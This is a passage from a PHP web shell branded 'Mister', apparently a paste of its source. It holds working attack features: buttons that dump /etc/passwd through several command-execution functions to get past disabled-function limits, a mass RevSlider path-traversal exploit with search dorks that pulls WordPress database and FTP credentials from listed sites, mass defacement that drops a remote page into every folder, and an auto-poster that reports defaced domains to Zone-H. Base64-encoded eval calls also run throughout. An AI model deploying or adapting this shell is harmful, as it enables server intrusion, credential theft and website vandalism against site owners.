  2151. </p>
  2152.  
  2153. <p><center><span style="font-size:10px;  color:#0000F0">Bypass with shell_exec Function
  2154. <form method="post">
  2155. <input type="submit" value="Bypass" name="shex" class="Mister-button">
  2156. </form>
  2157. </center><br>
  2158. </p>
  2159.  
  2160. <p><center><span style="font-size:10px;  color:#0000F0">Bypass with posix_getpwuid Function
  2161. <form method="post">
  2162. <input type="submit" value="Bypass" name="Mister" class="Mister-button">
  2163. </form>
  2164. </center><br>
  2165. </p>
  2166. <center>';
  2167. //System Function //
  2168. if($_POST['syst'])
  2169. {
  2170. echo"<textarea cols='65' rows='15' style='width:60%'>";
  2171. echo system("cat /etc/passwd");
  2172. echo"</textarea><br>";
  2173. echo"
  2174. <br>
  2175.  
  2176. </b>
  2177. <br>
  2178. ";
  2179. }
  2180. echo '
  2181. </center>
  2182. <center>';
  2183. //Passthru Function //
  2184. if($_POST['passth'])
  2185. {
  2186. echo"<textarea cols='65' rows='15' style='width:60%'>";
  2187. echo passthru("cat /etc/passwd");
  2188. echo"</textarea><br>";
  2189. echo"
  2190. <br>
  2191. </b>
  2192. <br>
  2193. ";
  2194. }
  2195. echo '
  2196. </center>
  2197. <center>';
  2198. //exec Function //
  2199. if($_POST['ex'])
  2200. {
  2201. echo"<textarea cols='65' rows='15' style='width:60%'>";
  2202. echo exec("cat /etc/passwd");
  2203. echo"</textarea><br>";
  2204. echo"
  2205. <br>
  2206. </b>
  2207. <br>
  2208. ";
  2209. }
  2210. echo '
  2211. </center>
  2212. <center>';
  2213. //exec Function //
  2214. if($_POST['shex'])
  2215. {
  2216. echo"<textarea cols='65' rows='15' style='width:60%'>";
  2217. echo shell_exec("cat /etc/passwd");
  2218. echo"</textarea><br>";
  2219. echo"
  2220. <br>
  2221.  
  2222. </b>
  2223. <br>
  2224. ";
  2225. }
  2226. echo '</center>
  2227. <center>';
  2228.    
  2229.  
  2230.  
  2231. //posix_getpwuid Function //
  2232. if($_POST['Mister'])
  2233. {
  2234. echo"<textarea cols='65' rows='15' style='width:60%'>";
  2235. for($uid=0;$uid<60000;$uid++){
  2236. $ara = posix_getpwuid($uid);
  2237. if (!empty($ara)) {
  2238. while (list ($key, $val) = each($ara)){
  2239. print "$val:";
  2240. }
  2241. print "\n";
  2242. }
  2243. }
  2244. echo"</textarea><br>";
  2245. }
  2246. $FOTTER2 = "<footer class='MK-footer'>";  
  2247. echo ''. $FOTTER2 .'' ;
  2248. $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUIMKpIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw=");
  2249. echo ''. $COPYRIGHT1 .'<button class="MK-Bouton">' ;
  2250. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  2251. $SERVERIP1 = "SERVER IP :";
  2252. echo ''. $SERVERIP1 .'' ;
  2253. $SPAN2 = "<span style='color:#FFFFFF;'>";
  2254. $SPAN3 = "</span>";
  2255. echo ''. $SPAN2 .'' ;
  2256. echo $SERVERIP = gethostbyname($_SERVER["HTTP_HOST"]); echo ''. $SPAN3 .'' ;
  2257. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  2258. $CLIENTIP1 = "CLIENT IP :"; echo ''. $CLIENTIP1 .'';
  2259. echo ''. $SPAN2 .'' ; echo $_SERVER['REMOTE_ADDR'];
  2260. echo ''. $SPAN3 .'</button><button class="MK-Bouton">';
  2261. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  2262. $HOSTOWNED1 = "HOST OWNED :";
  2263. echo ''. $HOSTOWNED1 .'' ;
  2264. echo ''. $SPAN2 .'' ; echo $_SERVER['SERVER_NAME'] ; echo ''. $SPAN3 .'</button> ';
  2265.  
  2266.  
  2267. $REPORTERROR = "|  ALL RIGHT RESERVED™ |";
  2268. echo ''. $REPORTERROR .'</a></span></footer>';
  2269. echo ''. $THEEND .'' ;
  2270. exit ;}
  2271. //////////// READ
  2272. if ($_GET["Mister"] == "read"){
  2273. echo "<br><center><nav class='social'><ul>
  2274. <li><a href='?Mister=read'>Read /Etc/Passwd</a></li>
  2275. <li><a href='?Mister=EtcExtract'> ExtracT Users From /etc/passwd</a></li>
  2276. <li><a href='?Mister=Cms'>Cms Scanner</a></li>
  2277. </ul></nav></center>";
  2278. echo "<nav class='Mister-nav'><center><span style='font-size:18px;  color:#0000F0'>READ /ETC/PASSWD</span></nav><center>";
  2279. echo "<br><div class=content><form method='post' action='?Mister=read&save=1'><textarea cols='50' rows='10' name='file' class='input'  style='height:100px;width:40%;'>";
  2280. flush();
  2281. flush();
  2282. $file = '/etc/named.conf';
  2283.  
  2284. $w0co = @fopen($file, 'r');
  2285. if ($w0co){
  2286. $content = @fread($w0co, @FILESIZE($file));
  2287. echo "".htmlentities($content)."";
  2288. }
  2289. else if (!$w0co)
  2290. {
  2291. $w0co = @show_source($file) ;
  2292. }
  2293. else if (!$w0co)
  2294. {
  2295. $w0co = @highlight_file($file);
  2296. }
  2297. else if (!$w0co)
  2298. {
  2299. $sm = @symlink($file,'MISTER.txt');
  2300.  
  2301.  
  2302. if ($sm){
  2303. $w0co = @fopen('named.txt', 'r');
  2304. $content = @fread($w0co, @FILESIZE($file));
  2305. echo "".htmlentities($content)."";
  2306. }
  2307. }
  2308. echo "</textarea><br><br><input  type='submit' value='SAVE' class='Mister-button'></form><br><br>";
  2309. if(isset($_GET['save'])){
  2310. $cont = stripcslashes($_POST['file']);
  2311. $f = fopen('named.txt','w');
  2312. $w = fwrite($f,$cont);
  2313. if($w){
  2314. echo '<span style="font-size:10px;  color:#0000F0">SAVE HAS BEEN SUCCESSFULLY </span>';
  2315. }
  2316. fclose($f);
  2317. }
  2318. ///// FOOTER
  2319. $FOTTER2 = "<footer class='MK-footer'>";  
  2320. echo ''. $FOTTER2 .'' ;
  2321. $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUIMKpIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw=");
  2322. echo ''. $COPYRIGHT1 .'<button class="MK-Bouton">' ;
  2323. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  2324. $SERVERIP1 = "SERVER IP :";
  2325. echo ''. $SERVERIP1 .'' ;
  2326. $SPAN2 = "<span style='color:#FFFFFF;'>";
  2327. $SPAN3 = "</span>";
  2328. echo ''. $SPAN2 .'' ;
  2329. echo $SERVERIP = gethostbyname($_SERVER["HTTP_HOST"]); echo ''. $SPAN3 .'' ;
  2330. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  2331. $CLIENTIP1 = "CLIENT IP :"; echo ''. $CLIENTIP1 .'';
  2332. echo ''. $SPAN2 .'' ; echo $_SERVER['REMOTE_ADDR'];
  2333. echo ''. $SPAN3 .'</button><button class="MK-Bouton">';
  2334. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  2335. $HOSTOWNED1 = "HOST OWNED :";
  2336. echo ''. $HOSTOWNED1 .'' ;
  2337. echo ''. $SPAN2 .'' ; echo $_SERVER['SERVER_NAME'] ; echo ''. $SPAN3 .'</button> ';
  2338.  
  2339.  
  2340. $REPORTERROR = "|  ALL RIGHT RESERVED™ |";
  2341. echo ''. $REPORTERROR .'</a></span></footer>';
  2342. echo ''. $THEEND .'' ;
  2343. exit ;
  2344. }
  2345. ////// REVSLIDE
  2346. if ($_GET["Mister"] == "Rev"){
  2347. echo "<br><center><nav class='social'><ul>
  2348. <li><a href='?Mister=FinderAdmin'>Finder Administer Panel V1.0</a></li>
  2349. <li><a href='?Mister=Domains'>Get All Domains</a></li>
  2350. <li><a href='?Mister=Finder'>Finder Database Panel</a></li>
  2351. <li><a href='?Mister=Getip'>Get Ip 2 Domains </a></li>
  2352. <li><a href='?Mister=subdomain'>Subdomain Checker</a></li>
  2353. <li><a href='?Mister=iplookdom'>Ip Lookup Reverse</a></li>
  2354. <li><a href='?Mister=Rev'>Mass Read Config </a></li>
  2355. <li><a href='?Mister=Grabber'>Grabber Config Attack</a></li>
  2356. <li><a href='?Mister=J-Scann3r'>Joomla Serv3r Scann3r</a></li>
  2357. <li><a href='?Mister=whois'>Website Whois</a></li>
  2358. </ul></nav></center>";
  2359. echo "<nav class='Mister-nav'><center><span style='font-size:18px;  color:#0000F0'>WORDPRESS READ CONFIG </span></nav><br><div class=content><center>";
  2360. echo "
  2361. <center><span style=' color:white' >Dork : </span></center>
  2362. <center><span> intext:Powered by Revslider </span> <br>
  2363. <span> inurl:plugins/revslider/ </span> </center>";
  2364. //////////////////// EXEMPLET
  2365. echo"<form method='post' name='login'>
  2366. <br><center><span style=' color:white' >List Url : </span><br></center>
  2367. <textarea name='sites' cols='10' rows='10' class='input' style='height:150px; width:50%;'>
  2368. http://www.Exemple.com\nhttp://www.Exemple.com\nhttp://www.Exemple.com\nhttp://www.Exemple.com</textarea>
  2369. <br>
  2370. <center><br><input type='submit' value='Read Config' name='go' class='Mister-button'><center>
  2371. </form><span>
  2372. ";
  2373. function findit($mytext,$starttag,$endtag) {
  2374.  $posLeft  = stripos($mytext,$starttag)+strlen($starttag);
  2375.  $posRight = stripos($mytext,$endtag,$posLeft+1);
  2376.  return  substr($mytext,$posLeft,$posRight-$posLeft);
  2377. }
  2378. error_reporting(0);
  2379. set_time_limit(0);
  2380. $ya=$_POST['go'];
  2381. $co=$_POST['sites'];
  2382.  
  2383. if($ya){
  2384.  $e=explode("\r\n",$co);
  2385.  foreach($e as $bda){
  2386. echo '<br>'.$bda;
  2387.     $linkof='/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php';
  2388.     $dn=($bda).($linkof);
  2389.     $file=@file_get_contents($dn);
  2390.     if(eregi('DB_HOST',$file) and !eregi('FTP_USER',$file) ){
  2391.     echo"<center><span style='font-size:10px;color:#0000F0'><b>&check; Infected ! </b></span></center>";
  2392.     echo "<center><font  color='white' >".$bda."</font></center>";
  2393.     echo "<span style='font-size:10px;  color:lime'>DB name : </font>".findit($file,"DB_NAME', '","');")."<br>";
  2394.     echo "<span style='font-size:10px;  color:lime'>DB user : </font>".findit($file,"DB_USER', '","');")."<br>";
  2395.     echo "<span style='font-size:10px;  color:lime'>DB pass : </font>".findit($file,"DB_PASSWORD', '","');")."<br>";
  2396.     echo "<span style='font-size:10px;  color:lime'>DB host : </font>".findit($file,"DB_HOST', '","');")."<br>";
  2397.     }
  2398.     elseif(eregi('DB_HOST',$file) and eregi('FTP_USER',$file)){
  2399.     echo'<center>++++++++++++++++++++++++++++++++++++++</center>';
  2400.     echo"<center><span style='font-size:10px;  color:#0000F0'><b>&check; Infected ! </b></span></center>";    
  2401.     echo "<center><span style='font-size:10px;  color:white'>".$bda."</span></center>";
  2402.     echo "<span style='font-size:10px;  color:lime'>FTP user : </font>".findit($file,"FTP_USER','","');")."<br>";
  2403.     echo "<span style='font-size:10px;  color:lime'>FTP pass : </font>".findit($file,"FTP_PASS','","');")."<br>";
  2404.     echo "<span style='font-size:10px;  color:lime'>FTP host : </font>".findit($file,"FTP_HOST','","');")."<br>";
  2405.     }
  2406.     else{
  2407.     echo'<center>++++++++++++++++++++++++++++++++++++++</center>';    
  2408.     echo "<center><p style='text-align: center;'>&check; <span color=white>".$bda."</span> ? </font><span style='font-size:10px;  color:red'>? ERUR :'(</span></center>";}
  2409.     echo'<center>++++++++++++++++++++++++++++++++++++++</center>';
  2410.  }
  2411.  
  2412. }
  2413.  
  2414. if(isset($site)){
  2415.  
  2416. foreach($list as $path => $test) {
  2417. $ch = curl_init();
  2418. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2419. curl_setopt($ch, CURLOPT_HEADER, 1);
  2420. curl_setopt($ch, CURLOPT_URL, $site.$test);
  2421. $result = curl_exec($ch);
  2422. curl_close($ch);
  2423. //print $url;
  2424. if (preg_match("/200 OK/", $result)){
  2425. echo "<br /><span style='font-size:10px;  color:green'>[+]</span><span style='font-size:10px;  color:#0000F0'> Found ? </font><span style='font-size:10px;  color:white'><a>[ $site$test ]</A></span></b>";
  2426. }
  2427. else if (preg_match("/401 Unauthorized/", $result)) {
  2428. echo "<br /><span style='font-size:10px;  color:#ffa71c'>[!]</span><span style='font-size:10px;  color:#0000F0'> Found ? </font><span style='font-size:10px;  color:white'><a>[ $site$test ]</A></font><a>[ $site$test ]</A></span></b>";
  2429. echo "<br /><span style='font-size:10px;  color:#0000F0'>[-]</span><span style='font-size:10px;  color:#0000F0'> Nothing Found On </span><span style='font-size:10px;  color:white'><a>[ $site$test ]</A></span><a>[$site$test]</a></span>";
  2430. }
  2431. }
  2432. }
  2433. echo "<br>";$FOTTER2 = "<footer class='MK-footer'>";  
  2434. echo ''. $FOTTER2 .'' ;
  2435. $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUIMKpIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw=");
  2436. echo ''. $COPYRIGHT1 .'<button class="MK-Bouton">' ;
  2437. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  2438. $SERVERIP1 = "SERVER IP :";
  2439. echo ''. $SERVERIP1 .'' ;
  2440. $SPAN2 = "<span style='color:#FFFFFF;'>";
  2441. $SPAN3 = "</span>";
  2442. echo ''. $SPAN2 .'' ;
  2443. echo $SERVERIP = gethostbyname($_SERVER["HTTP_HOST"]); echo ''. $SPAN3 .'' ;
  2444. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  2445. $CLIENTIP1 = "CLIENT IP :"; echo ''. $CLIENTIP1 .'';
  2446. echo ''. $SPAN2 .'' ; echo $_SERVER['REMOTE_ADDR'];
  2447. echo ''. $SPAN3 .'</button><button class="MK-Bouton">';
  2448. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  2449. $HOSTOWNED1 = "HOST OWNED :";
  2450. echo ''. $HOSTOWNED1 .'' ;
  2451. echo ''. $SPAN2 .'' ; echo $_SERVER['SERVER_NAME'] ; echo ''. $SPAN3 .'</button> ';
  2452.  
  2453.  
  2454. $REPORTERROR = "|  ALL RIGHT RESERVED™ |";
  2455. echo ''. $REPORTERROR .'</a></span></footer>';
  2456. echo ''. $THEEND .'' ;
  2457. exit;}
  2458. //////////// THE MASS DEFACE
  2459. if ($_GET['Mister'] == 'Mass') {
  2460. echo "<br><center><nav class='social'><ul>
  2461. <li><a href='?Mister=Mass'> Mass Deface All Folder</a></li>
  2462. <li><a href='?Mister=Mass_up'> Mass Upload Deface in All Folder</a></li>
  2463. </ul></nav></center>";
  2464. echo "<nav class='Mister-nav'><center><span style='font-size:18px;color:#0000F0'>MASS DEFACE ALL FOLDER</span></nav><br><div class=content>
  2465. <center><span style=' color:#FFFFFF'>EX : </span>HTTP://TARGET.COM/INDEX.PHP
  2466. <center>";
  2467. echo "<span style=' color:#FFFFFF'>";
  2468. $defaceurl = $_POST['massdefaceurl'];
  2469. $dir = $_POST['massdefacedir'];
  2470. echo $dir."\n";
  2471. if (is_dir($dir)) {
  2472. if ($dh = opendir($dir)) {
  2473. while (($file = readdir($dh)) !== false) {
  2474. if(filetype($dir.$file)=="dir"){
  2475. $newfile=$dir.$file."/index.php";
  2476. echo "<br>";
  2477. echo $newfile."\n";
  2478. if (!copy($defaceurl, $newfile)) {
  2479. echo "<span style='color:#f60000'>FAILED TO COPY </span><span style='color:#0000F0;'>$file...</span>\n";
  2480. }
  2481. }
  2482. }
  2483. closedir($dh);
  2484. }
  2485. }
  2486. echo "<br>";eval("?>".base64_decode
  2487. ("PGZvcm0gYWN0aW9uPSc8P3BocCBiYXNlbmFtZSgkX1NFUlZFUlsnUEhQX1NFTEYnXSk7ID8+JyBtZXRob2Q9J3Bvc3QnPg0KPHNwYW4+DQpbK10gTUFJTiBESVJFQ1RPUlk6PC9zcGFuPjxicj48aW5wdXQgdHlwZT0ndGV4dCcgc3R5bGU9J3dpZHRoOjQwJScgdmFsdWU9Jzw/cGhwICBlY2hvIGdldGN3ZCgpIC4gIi8iOyA/PicgbmFtZT0nbWFzc2RlZmFjZWRpcicgY2xhc3M9J2lucHV0Jz4="));
  2488. echo "<br><span><br>[+] DEFACEMENT URL: </span><br><input type='text' style='width:250px' name='massdefaceurl' placeholder='http://www.exemple.com/Deface.php' class='input'><br><br>
  2489. <input type='submit' name='execmassdeface' value='DEFACE IT' class='Mister-button' required></form></td>";
  2490.         echo '<br><br>';
  2491.         //// Footer
  2492. $FOTTER2 = "<footer class='MK-footer'>";  
  2493. echo ''. $FOTTER2 .'' ;
  2494. $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUIMKpIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw=");
  2495. echo ''. $COPYRIGHT1 .'<button class="MK-Bouton">' ;
  2496. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  2497. $SERVERIP1 = "SERVER IP :";
  2498. echo ''. $SERVERIP1 .'' ;
  2499. $SPAN2 = "<span style='color:#FFFFFF;'>";
  2500. $SPAN3 = "</span>";
  2501. echo ''. $SPAN2 .'' ;
  2502. echo $SERVERIP = gethostbyname($_SERVER["HTTP_HOST"]); echo ''. $SPAN3 .'' ;
  2503. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  2504. $CLIENTIP1 = "CLIENT IP :"; echo ''. $CLIENTIP1 .'';
  2505. echo ''. $SPAN2 .'' ; echo $_SERVER['REMOTE_ADDR'];
  2506. echo ''. $SPAN3 .'</button><button class="MK-Bouton">';
  2507. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  2508. $HOSTOWNED1 = "HOST OWNED :";
  2509. echo ''. $HOSTOWNED1 .'' ;
  2510. echo ''. $SPAN2 .'' ; echo $_SERVER['SERVER_NAME'] ; echo ''. $SPAN3 .'</button> ';
  2511. $REPORTERROR = "|  ALL RIGHT RESERVED™ |";
  2512. echo ''. $REPORTERROR .'</a></span></footer>';
  2513. echo ''. $THEEND .'' ;
  2514. exit;}
  2515. //////////// THE MASS DEFACE2
  2516. if ($_GET['Mister'] == 'Mass_up') {
  2517. echo "<br><center><nav class='social'><ul>
  2518. <li><a href='?Mister=Mass'> Mass Deface All Folder</a></li>
  2519. <li><a href='?Mister=Mass_up'> Mass Upload Deface in All Folder</a></li>
  2520. </ul></nav></center>";
  2521. echo "<nav class='Mister-nav'><center><span style='font-size:18px;color:#0000F0'>MASS UPLOAD DEFACE IN ALL FOLDER</span></nav><br><div class=content>
  2522. <center><span style=' color:#FFFFFF'>EX : </span>HTTP://TARGET.COM/MK.PHP
  2523. <center>";
  2524. echo "<span style=' color:#FFFFFF'>";
  2525. $defaceurl = $_POST['massdefaceurl'];
  2526. $dir = $_POST['massdefacedir'];
  2527. echo $dir."\n";
  2528. if (is_dir($dir)) {
  2529. if ($dh = opendir($dir)) {
  2530. while (($file = readdir($dh)) !== false) {
  2531. if(filetype($dir.$file)=="dir"){
  2532. $newfile=$dir.$file."/MK.php";
  2533. echo "<br>";
  2534. echo $newfile."\n";
  2535. if (!copy($defaceurl, $newfile)) {
  2536. echo "<span style='color:#f60000'>FAILED TO COPY </span><span style='color:#0000F0;'>$file...</span>\n";
  2537. }
  2538. }
  2539. }
  2540. closedir($dh);
  2541. }
  2542. }
  2543. echo "<br>";eval("?>".base64_decode
  2544. ("PGZvcm0gYWN0aW9uPSc8P3BocCBiYXNlbmFtZSgkX1NFUlZFUlsnUEhQX1NFTEYnXSk7ID8+JyBtZXRob2Q9J3Bvc3QnPg0KPHNwYW4+DQpbK10gTUFJTiBESVJFQ1RPUlk6PC9zcGFuPjxicj48aW5wdXQgdHlwZT0ndGV4dCcgc3R5bGU9J3dpZHRoOjQwJScgdmFsdWU9Jzw/cGhwICBlY2hvIGdldGN3ZCgpIC4gIi8iOyA/PicgbmFtZT0nbWFzc2RlZmFjZWRpcicgY2xhc3M9J2lucHV0Jz4="));
  2545. echo "<br><span><br>[+] DEFACEMENT URL: </span><br><input type='text' style='width:250px' name='massdefaceurl' placeholder='http://www.exemple.com/Deface.php' class='input'><br><br>
  2546. <input type='submit' name='execmassdeface' value='UP DEFACE!' class='Mister-button' required></form></td>";
  2547.         echo '<br><br>';
  2548.         //// Footer
  2549. $FOTTER2 = "<footer class='MK-footer'>";  
  2550. echo ''. $FOTTER2 .'' ;
  2551. $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUIMKpIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw=");
  2552. echo ''. $COPYRIGHT1 .'<button class="MK-Bouton">' ;
  2553. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  2554. $SERVERIP1 = "SERVER IP :";
  2555. echo ''. $SERVERIP1 .'' ;
  2556. $SPAN2 = "<span style='color:#FFFFFF;'>";
  2557. $SPAN3 = "</span>";
  2558. echo ''. $SPAN2 .'' ;
  2559. echo $SERVERIP = gethostbyname($_SERVER["HTTP_HOST"]); echo ''. $SPAN3 .'' ;
  2560. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  2561. $CLIENTIP1 = "CLIENT IP :"; echo ''. $CLIENTIP1 .'';
  2562. echo ''. $SPAN2 .'' ; echo $_SERVER['REMOTE_ADDR'];
  2563. echo ''. $SPAN3 .'</button><button class="MK-Bouton">';
  2564. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  2565. $HOSTOWNED1 = "HOST OWNED :";
  2566. echo ''. $HOSTOWNED1 .'' ;
  2567. echo ''. $SPAN2 .'' ; echo $_SERVER['SERVER_NAME'] ; echo ''. $SPAN3 .'</button> ';
  2568.  
  2569.  
  2570. $REPORTERROR = "|  ALL RIGHT RESERVED™ |";
  2571. echo ''. $REPORTERROR .'</a></span></footer>';
  2572. echo ''. $THEEND .'' ;
  2573. exit;}
  2574. /////////////////// ZONE-H
  2575. if ($_GET['Mister'] == 'Zoneh') {
  2576. $FOTTER2 = "<footer class='MK-footer'>";  
  2577. echo ''. $FOTTER2 .'' ;
  2578. $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUIMKpIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw=");
  2579. echo ''. $COPYRIGHT1 .'<button class="MK-Bouton">' ;
  2580. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  2581. $SERVERIP1 = "SERVER IP :";
  2582. echo ''. $SERVERIP1 .'' ;
  2583. $SPAN2 = "<span style='color:#FFFFFF;'>";
  2584. $SPAN3 = "</span>";
  2585. echo ''. $SPAN2 .'' ;
  2586. echo $SERVERIP = gethostbyname($_SERVER["HTTP_HOST"]); echo ''. $SPAN3 .'' ;
  2587. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  2588. $CLIENTIP1 = "CLIENT IP :"; echo ''. $CLIENTIP1 .'';
  2589. echo ''. $SPAN2 .'' ; echo $_SERVER['REMOTE_ADDR'];
  2590. echo ''. $SPAN3 .'</button><button class="MK-Bouton">';
  2591. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  2592. $HOSTOWNED1 = "HOST OWNED :";
  2593. echo ''. $HOSTOWNED1 .'' ;
  2594. echo ''. $SPAN2 .'' ; echo $_SERVER['SERVER_NAME'] ; echo ''. $SPAN3 .'</button> ';
  2595.  
  2596.  
  2597. $REPORTERROR = "|  ALL RIGHT RESERVED™ |";
  2598. echo ''. $REPORTERROR .'</a></span></footer>';
  2599. echo ''. $THEEND .'' ;
  2600. echo "<br><nav class='Mister-nav'><center><span style='font-size:18px;color:#0000F0'>ZONE-H AUTO POSTER</span></nav><br><div class=content><center>";
  2601. $defacer='YOUR NICK NAME';$display_details=0;$method=14;$reason=5;error_reporting(0);set_time_limit(0);if(!function_exists('curl_init')){echo "CURL ERROR\n";exit;}$cli=(isset($argv[0]))?1:0;if($cli==1){$file=$argv[1];$sites=file($file);}if(function_exists(apache_setenv)){@apache_setenv('no-gzip', 1);}@ini_set('zlib.output_compression', 0);@ini_set('implicit_flush', 1);@ob_implicit_flush(true);@ob_end_flush();if(isset($_POST['domains'])){$sites=explode("\n",$_POST['domains']);}if (FILE_EXISTS($_FILES["file"]["tmp_name"])){$file=$_FILES["file"]["tmp_name"];$sites=file($file);}
  2602. if(!isset($_POST['defacer'])){
  2603. echo <<<EOF
  2604. <form enctype="multipart/form-data" method="POST"><div align='center'><br>
  2605. CONECT TO : <span style='color:white'> HTTP://WWW.ZONE-H.ORG/NOTIFY/MASS</span>
  2606. <span style='color:white'><br> DEFACER : <br></span></b></span><input name="defacer" type="text" value="$defacer" style="width:40%" class="input"><br/><table width='40%' ><tr><td align='center'><span lang='en-us'><span style='color:#FFFFFF'><br>DOMAINS : </span></span><p align='center'><textarea rows='10' name='domains' placeholder='PASTE YOUR DOMAINS HERE' cols='50' class="input" style="height:100px;"></textarea><br><br><input name="submit"  type="submit" value='SEND' class="Mister-button"><br><br></p></td></tr></form></div>
  2607. EOF;
  2608. }$defacer=$_POST['defacer'];if(!$sites){echo '</pre>';exit;} echo "<br><br><center><span style='font-size:10px;  color:#FFFFFF'> TOTAL UNIQUE DOMAIN</span><br> $total\n\n";$sites=array_unique(str_replace('http://','',$sites));$total=count($sites);$pause=10;$start=time();$main=curl_multi_init();for($m=0;$m<3;$m++){$http[] = curl_init();}for($n=0;$n<$total;$n +=30){if($display_details==1){for($x=0;$x<30;$x++){echo'<br>[+] ADDING <br>'.rtrim($sites[$n+$x]).'';echo "\n";}}$d=$n+30;if($d>$total){$d=$total;}echo "<br><br><br><br>[$d/$total]\n";for($w=0;$w<3;$w++){$p=$w * 10;if(!(isset($sites[$n+$p]))){$pause=$w;break;}$posts[$w]="defacer=$defacer&domain1=http%3A%2F%2F".rtrim($sites[$n+$p])."&domain2=http%3A%2F%2F".rtrim($sites[$n+$p+1])."&domain3=http%3A%2F%2F".rtrim($sites[$n+$p+2])."&domain4=http%3A%2F%2F".rtrim($sites[$n+$p+3])."&domain5=http%3A%2F%2F".rtrim($sites[$n+$p+4])."&domain6=http%3A%2F%2F".rtrim($sites[$n+$p+5])."&domain7=http%3A%2F%2F".rtrim($sites[$n+$p+6])."&domain8=http%3A%2F%2F".rtrim($sites[$n+$p+7])."&domain9=http%3A%2F%2F".rtrim($sites[$n+$p+8])."&domain10=http%3A%2F%2F".rtrim($sites[$n+$p+9])."&hackmode=".$method."&reason=".$reason."&submit=Send";$curlopt=array(CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 6.1;WOW64) AppleWebKit/535.16 (KHTML, like Gecko) Chrome/18.0.1003.1 Safari/535.16',CURLOPT_RETURNTRANSFER => true,CURLOPT_FOLLOWLOCATION =>true,CURLOPT_ENCODING => true,CURLOPT_HEADER => false,CURLOPT_HTTPHEADER => array("Keep-Alive: 7"),CURLOPT_CONNECTTIMEOUT => 3,CURLOPT_URL => 'http://www.zone-h.org/notify/mass',CURLOPT_POSTFIELDS => $posts[$w]);curl_setopt_array($http[$w],$curlopt);curl_multi_add_handle($main,$http[$w]);}$running = null;do{curl_multi_exec($main,$running);}while($running > 0);for($m=0;$m<3;$m++){if($pause==$m){break;}curl_multi_remove_handle($main, $http[$m]);$code = curl_getinfo($http[$m], CURLINFO_HTTP_CODE);if ($code != 200) {while(true){echo' <br><span style="color:red">ERROR RETRYING.... </span><br>';echo "\n";sleep(5);curl_exec($http[$m]);$code = curl_getinfo($http[$m], CURLINFO_HTTP_CODE);if( $code== 200){break 1;}}}}}$end= time() - $start;echo 'Done';echo "\n\n[*]Time: $end seconds\n";curl_multi_close($main);if($cli==0){echo '</body></html>';}
  2609. exit;}
  2610. //////////// FINDER
  2611. if ($_GET['Mister'] == 'Finder') {
  2612. echo "<br><center><nav class='social'><ul>
  2613. <li><a href='?Mister=FinderAdmin'>Finder Administer Panel V1.0</a></li>
  2614. <li><a href='?Mister=Domains'>Get All Domains</a></li>
  2615. <li><a href='?Mister=Finder'>Finder Database Panel</a></li>
  2616. <li><a href='?Mister=Getip'>Get Ip 2 Domains </a></li>
  2617. <li><a href='?Mister=subdomain'>Subdomain Checker</a></li>
  2618. <li><a href='?Mister=iplookdom'>Ip Lookup Reverse</a></li>
  2619. <li><a href='?Mister=Rev'>Mass Read Config </a></li>
  2620. <li><a href='?Mister=Grabber'>Grabber Config Attack</a></li>
  2621. <li><a href='?Mister=J-Scann3r'>Joomla Serv3r Scann3r</a></li>
  2622. <li><a href='?Mister=whois'>Website Whois</a></li>
